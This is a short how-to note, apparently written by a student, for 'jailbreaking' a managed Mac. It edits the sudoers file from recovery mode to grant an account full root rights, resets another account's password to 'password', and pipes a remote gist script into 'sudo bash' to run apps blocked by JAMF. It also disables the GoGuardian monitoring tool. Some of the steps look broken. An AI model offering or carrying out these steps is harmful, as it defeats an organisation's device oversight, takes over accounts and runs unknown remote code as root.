Hello World!

-------------------------------------

cmds to run in recovery shell:

vim "/Volumes/Macintosh HD/private/etc/sudoers"

Scroll to the bottom, press o right at the end of the line %admin ALL = (ALL) ALL

Then type (everything following in the quotes): "username ALL=(ALL) ALL"

Of course, substitute username for your account's username.

Press esc, type :w! , press enter, type :q , press enter.

Then run all of these commands:

chown 0:0 "/Volumes/Macintosh HD - Data/private/etc/sudoers"

chmod 0440 "/Volumes/Macintosh HD - Data/private/etc/sudoers"

xattr -c "/Volumes/Macintosh HD - Data/private/etc/sudoers"

rm -rf "/Volumes/Macintosh HD - Data/private/var/db/sudo/*"

cd /

curl -O https://ghostty.org

cp /Ghostty.dmg "/Volumes/Macintosh HD/Applications"

Exit and boot into macOS, open Ghostty from /Applications and run the following:

sudo dscl . -passwd /Users/cnstester password

This allows you to boot into the user cnstester from the login screen with password "password"

curl -fsSL https://gist.githubusercontent.com/Tenth8602/5521a93c32b568703ae5e3bfa97f5cf9/raw/1822a5bf97e933b0a4f12046cf084d9d8afffddd/e.sh | sudo bash

This allows you to open apps blocked by JAMF

Open settings and VPNs and disable GoGuardian app.

Jailbroken